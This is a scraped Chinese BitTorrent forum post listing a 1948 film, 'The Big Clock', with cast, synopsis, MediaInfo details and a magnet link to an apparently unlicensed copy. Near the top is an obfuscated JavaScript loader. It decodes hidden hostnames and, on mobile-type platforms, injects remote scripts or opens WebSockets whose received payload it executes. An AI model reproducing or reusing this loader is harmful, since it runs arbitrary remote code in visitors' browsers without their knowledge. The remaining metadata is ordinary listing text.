大钟[中文字幕].The.Big.Clock.1948.1080p.BluRay.x265.10bit.FLAC.1.0 8.56GB

版主小s 20天前 152

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x46\x6a\x59\x48\x73\x4f\x52\x52\x45\x59']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxza2pmLm5pYYW5nYYW94aWFuc2hlbmcuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译  名 大钟
◎片  名 The Big Clock
◎年  代 1948
◎产  地 美国
◎类  别 剧情 / 悬疑 / 惊悚 / 犯罪 / 黑色电影
◎语  言 英语
◎上映日期 1948-04-09
◎IMDb链接 https://www.imdb.com/title/tt0040160/
◎豆瓣评分 7.8/10 (449人评价)
◎豆瓣链接 https://movie.douban.com/subject/1865026/
◎片  长 95 分钟
◎导  演 约翰·法罗 John Farrow (id:1007174)
◎编  剧 乔纳森·拉蒂梅尔 Jonathan Latimer (id:1029065)
       肯尼思·费林 Kenneth Fearing (id:1025074)
◎演  员 雷·米兰德 Ray Milland (id:1014042)
       查尔斯·劳顿 Charles Laughton (id:1010665)
       莫琳·奥沙利文 Maureen O'Sullivan (id:1045027)
       诺尔·妮尔 Noel Neill (id:1131703)
       伯特·穆尔豪斯 Bert Moorhouse (id:1135738)
       Gordon Richards Gordon Richards (id:1141621)
       Joey Ray Joey Ray (id:1138858)
       Judy Nugent Judy Nugent (id:1130777)
       B.G. Norman B.G. Norman (id:1130732)
       Garry Owen Garry Owen (id:1128208)
       Barry Norton Barry Norton (id:1127820)
       Frances Morris Frances Morris (id:1127281)
       弗兰克奥思 Frank Orth (id:1126514)
       William Meader William Meader (id:1123379)
       乔治·麦克雷迪 George Macready (id:1122312)
       Harry Rosenthal Harry Rosenthal (id:1142550)
       Elaine Riley Elaine Riley (id:1142879)
       安东尼·利德 Anton Leader (id:1016998)
       Tad Van Brunt Tad Van Brunt (id:1339877)
       露西·诺奇 Lucy Knoch (id:1288772)
       Napoleon Whiting Napoleon Whiting (id:1167933)
       博比·沃森 Bobby Watson (id:1163349)
       道格拉斯·斯宾塞 Douglas Spencer (id:1158831)
       Philip Van Zandt Philip Van Zandt (id:1158609)
       路易斯范龙腾 Luis Van Rooten (id:1153615)
       Harland Tucker Harland Tucker (id:1151695)
       丹·托宾 Dan Tobin (id:1151397)
       Ern? Verebes Ern? Verebes (id:1150300)
       Pepito Pérez Pepito Pérez (id:1142998)
       哈罗德·弗米利娅 Harold Vermilyea (id:1149251)
       李·米勒 Lee Miller (id:1120794)
       Frances Conley Frances Conley (id:1073437)
       Mary Currier Mary Currier (id:1070626)
       Lucille Barkley Lucille Barkley (id:1066225)
       布鲁克斯·贝内迪克特 Brooks Benedict (id:1062314)
       Eric Alden Eric Alden (id:1058768)
       Harry Anderson Harry Anderson (id:1056860)
       莱恩·钱德勒 Lane Chandler (id:1054263)
       理查德·韦伯 Richard Webb (id:1050478)
       爱尔莎·兰切斯特 Elsa Lanchester (id:1041205)
       露丝·罗曼 Ruth Roman (id:1036688)
       劳埃德·科里根 Lloyd Corrigan (id:1028249)
       丽塔·约翰森 Rita Johnson (id:1023084)
       詹姆斯·伯克 James Burke (id:1076273)
       玛格丽特·菲尔德 Margaret Field (id:1080897)
       Henri Letondal Henri Letondal (id:1120278)
       诺曼·莱维特 Norman Leavitt (id:1111998)
       Jerry James Jerry James (id:1108682)
       鲍勃·科特曼 Bob Kortman (id:1105482)
       Earle Hodgins Earle Hodgins (id:1097626)
       阿特·吉尔摩 Art Gilmore (id:1095715)
       特蕾莎.哈里斯 Theresa Harris (id:1093568)
       斯图尔特·霍姆斯 Stuart Holmes (id:1091930)
       Henry Guttman Henry Guttman (id:1091694)
       Lester Dorr Lester Dorr (id:1085148)
       茱莉亚·法耶 Julia Faye (id:1085070)
       拉尔夫·邓恩 Ralph Dunn (id:1084774)
       Robert Stevenson Robert Stevenson (id:1084730)
       贝丝·弗劳尔斯 Bess Flowers (id:1084601)
       富兰克林·法纳姆 Franklyn Farnum (id:1083292)
       哈里·摩根 Harry Morgan (id:1002753)
       理查德·麦鲍姆 Richard Maibaum (id:1018729)
       维克多·杨 Victor Young (id:1055169)
       约翰·F·塞茨 John F. Seitz (id:1012757)
       丹尼尔·L·法普 Daniel L. Fapp (id:1048540)
       勒罗伊·斯通 LeRoy Stone (id:1017338)
       罗斯·道德 Ross Dowd (id:1090575)
       萨姆·库默 Sam Comer (id:1077404)
       汉斯·德雷尔 Hans Dreier (id:1022608)
       阿尔伯特·诺扎基 Albert Nozaki (id:1014858)
       罗兰德·安德森 Roland Anderson (id:1043090)
       伊迪丝·海德 Edith Head (id:1041085)
       沃利·韦斯特摩 Wally Westmore (id:1161458)
       赫伯特·科尔曼 Herbert Coleman (id:1038416)
       法乔特·埃多特 Farciot Edouart (id:1088231)
       高登·詹宁斯 Gordon Jennings (id:1287684)

◎标  签 美国 / 黑色电影 / 犯罪 / 悬疑 / 1948 / 1940s / 黑色 / 美国电影

◎简  介
  约翰·法罗执导的一部涉案片,讲述了一个出版大享凭借过人的胆识和智慧为自己洗刷谋杀罪名的故事。影片包容了言情、悬疑诸多元素,情节跌宕起伏,扣人心弦。                                    
                                出版大亨乔纳森拥有世界上最精确、最独特的私人大钟,这个钟造价高过60万美元,可以知道世界任何一个地方的时间。乔治就在这个出版机构任职。多年来,他忙于工作,连和妻子去度蜜月的时间都被突而其来的新闻采访所占去,内心深处觉得非常亏欠妻子。就在他准备休假陪妻子度蜜月时,他卷入了一起谋杀案,他所带领的团队负责向读者披露案件侦破过程,一个又一个的疑点对他相当不利,尽管他是无辜的,在紧张的调查过程中,他利用自己过人的胆识和智慧,为自己洗脱了罪名。

◎获奖情况 (共1项)
  第9届威尼斯电影节 (1948)
  国际奖 国际电影大奖(提名)
   └──约翰·法罗 (id:1007174)

  1. ##### MediaInfo ######

  2. General

  3. Unique ID                                : 282915861889102922031449055331315152049 (0xD4D79CEE945BEEB5CFEA1B3DF2E4F4B1)

  4. Complete name                            : [email protected].COM.mkv

  5. Format                                   : Matroska

  6. Format version                           : Version 4

  7. File size                                : 8.56 GiB

  8. Duration                                 : 1 h 35 min

  9. Overall bit rate mode                    : Variable

  10. Overall bit rate                         : 12.8 Mb/s

  11. Movie name                               : THE BIG CLOCK

  12. Encoded date                             : UTC 2021-09-01 07:17:15

  13. Writing application                      : mkvmerge v61.0.0 ('So') 64-bit

  14. Writing library                          : libebml v1.4.2 + libmatroska v1.6.4

  15. Cover                                    : Yes

  16. Attachments                              : cover.jpg


  17. Video

  18. ID                                       : 1

  19. Format                                   : HEVC

  20. Format/Info                              : High Efficiency Video Coding

  21. Format profile                           : Main [email protected]@Main

  22. Codec ID                                 : V_MPEGH/ISO/HEVC

  23. Duration                                 : 1 h 35 min

  24. Bit rate                                 : 12.1 Mb/s

  25. Width                                    : 1 448 pixels

  26. Height                                   : 1 080 pixels

  27. Display aspect ratio                     : 4:3

  28. Frame rate mode                          : Constant

  29. Frame rate                               : 23.976 (24000/1001/53354) FPS

  30. Color space                              : YUV

  31. Chroma subsampling                       : 4:2:0

  32. Bit depth                                : 10 bits

  33. Bits/(Pixel*Frame)                       : 0.324

  34. Stream size                              : 8.09 GiB (95%)

  35. Writing library                          : x265 3.5+2-g2b25c9ba0+45:[Windows][GCC 10.2.0][64 bit] Yuuki 10bit+8bit+12bit

  36. Encoding settings                        : rc=crf / crf=20.5000 / qcomp=0.70 / qpstep=4 / stats-write=0 / stats-read=0 / no-lossless / no-cu-lossless / aq-mode=3 / aq-strength=0.70 / cbqpoffs=0 / crqpoffs=0 / ipratio=1.40 / pbratio=1.30 / psy-rd=2.00 / psy-rdoq=0.00 / deblock=0:0 / ref=6 / limit-refs=1 / no-limit-modes / bframes=8 / b-adapt=2 / bframe-bias=0 / b-pyramid / b-intra / weightp / weightb / min-keyint=24 / max-keyint=240 / rc-lookahead=24 / gop-lookahead=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / max-cu-size=64 / min-cu-size=8 / me=3 / subme=7 / merange=48 / rdoq-level=0 / rd=4 / rdpenalty=0 / dynamic-rd=0.00 / no-rd-refine / ----- / cutree / sao / no-rect / no-amp / no-open-gop / wpp / no-pmode / pme / no-psnr / no-ssim / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-tu-size=32 / tu-inter-depth=1 / tu-intra-depth=1 / limit-tu=0 / qg-size=32 / qpmax=69 / qpmin=0 / ----- / cpuid=533541111039 / frame-threads=4 / numa-pools=+ / log-level=2 / input-csp=1 / input-res=1448x1080 / interlace=0 / level-idc=0 / high-tier=1 / uhd-bd=0 / no-allow-non-conformance / no-repeat-headers / aud / no-hrd / info / hash=0 / no-temporal-layers / lookahead-slices=0 / no-splice / no-intra-refresh / no-ssim-rd / signhide / no-tskip / max-merge=3 / temporal-mvp / no-frame-dup / no-hme / no-analyze-src-pics / no-sao-non-deblock / selective-sao=4 / early-skip / rskip / no-fast-intra / no-tskip-fast / no-splitrd-skip / zone-count=0 / no-strict-cbr / no-rc-grain / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=2 / transfer=2 / colormatrix=2 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / scenecut-aware-qp=0conformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0 / no-vbv-live-multi-pass

  37. Default                                  : Yes

  38. Forced                                   : No


  39. Audio

  40. ID                                       : 2

  41. Format                                   : FLAC

  42. Format/Info                              : Free Lossless Audio Codec

  43. Codec ID                                 : A_FLAC

  44. Duration                                 : 1 h 35 min

  45. Bit rate mode                            : Variable

  46. Bit rate                                 : 578 kb/s

  47. Channel(s)                               : 1 channel

  48. Channel layout                           : C

  49. Sampling rate                            : 48.0 kHz

  50. Frame rate                               : 11.719 FPS (4096 SPF)

  51. Bit depth                                : 24 bits

  52. Compression mode                         : Lossless

  53. Stream size                              : 394 MiB (5%)

  54. Writing library                          : libFLAC 1.2.1 (UTC 2007-09-17)

  55. Language                                 : English

  56. Default                                  : Yes

  57. Forced                                   : No


  58. Text #1

  59. ID                                       : 3

  60. ID in the original source medium         : 4609 (0x1201)

  61. Format                                   : PGS

  62. Muxing mode                              : zlib

  63. Codec ID                                 : S_HDMV/PGS

  64. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  65. Duration                                 : 1 h 34 min

  66. Bit rate                                 : 69.8 kb/s

  67. Count of elements                        : 2577

  68. Stream size                              : 47.0 MiB (1%)

  69. Title                                    : chs&eng

  70. Language                                 : Chinese

  71. Default                                  : Yes

  72. Forced                                   : No

  73. Original source medium                   : Blu-ray


  74. Text #2

  75. ID                                       : 4

  76. ID in the original source medium         : 4610 (0x1202)

  77. Format                                   : PGS

  78. Muxing mode                              : zlib

  79. Codec ID                                 : S_HDMV/PGS

  80. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  81. Duration                                 : 1 h 34 min

  82. Bit rate                                 : 70.4 kb/s

  83. Count of elements                        : 2577

  84. Stream size                              : 47.4 MiB (1%)

  85. Title                                    : cht&eng

  86. Language                                 : Chinese

  87. Default                                  : No

  88. Forced                                   : No

  89. Original source medium                   : Blu-ray


  90. Text #3

  91. ID                                       : 5

  92. ID in the original source medium         : 4611 (0x1203)

  93. Format                                   : PGS

  94. Muxing mode                              : zlib

  95. Codec ID                                 : S_HDMV/PGS

  96. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  97. Duration                                 : 1 h 34 min

  98. Bit rate                                 : 39.9 kb/s

  99. Count of elements                        : 2577

  100. Stream size                              : 26.9 MiB (0%)

  101. Title                                    : chs

  102. Language                                 : Chinese

  103. Default                                  : No

  104. Forced                                   : No

  105. Original source medium                   : Blu-ray


  106. Text #4

  107. ID                                       : 6

  108. ID in the original source medium         : 4612 (0x1204)

  109. Format                                   : PGS

  110. Muxing mode                              : zlib

  111. Codec ID                                 : S_HDMV/PGS

  112. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  113. Duration                                 : 1 h 34 min

  114. Bit rate                                 : 40.5 kb/s

  115. Count of elements                        : 2577

  116. Stream size                              : 27.3 MiB (0%)

  117. Title                                    : cht

  118. Language                                 : Chinese

  119. Default                                  : No

  120. Forced                                   : No

  121. Original source medium                   : Blu-ray


  122. Text #5

  123. ID                                       : 7

  124. ID in the original source medium         : 4608 (0x1200)

  125. Format                                   : PGS

  126. Muxing mode                              : zlib

  127. Codec ID                                 : S_HDMV/PGS

  128. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  129. Duration                                 : 1 h 32 min

  130. Bit rate                                 : 62.9 kb/s

  131. Count of elements                        : 3134

  132. Stream size                              : 41.5 MiB (0%)

  133. Title                                    : eng

  134. Language                                 : English

  135. Default                                  : No

  136. Forced                                   : No

  137. Original source medium                   : Blu-ray


  138. Menu

  139. 00:00:00.000                             : Chapter 01

  140. 00:08:08.237                             : Chapter 02

  141. 00:15:25.883                             : Chapter 03

  142. 00:24:10.740                             : Chapter 04

  143. 00:31:46.905                             : Chapter 05

  144. 00:38:25.678                             : Chapter 06

  145. 00:47:08.617                             : Chapter 07

  146. 00:54:41.444                             : Chapter 08

  147. 01:03:03.905                             : Chapter 09

  148. 01:12:39.480                             : Chapter 10

  149. 01:19:52.454                             : Chapter 11

  150. 01:25:29.207                             : Chapter 12



TAGS 剧情 惊悚 悬疑 犯罪 黑色电影

磁力链:
  • magnet:?xt=urn:btih:CB7E297A46DFBFC0142EABF8506B662142C3A962
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回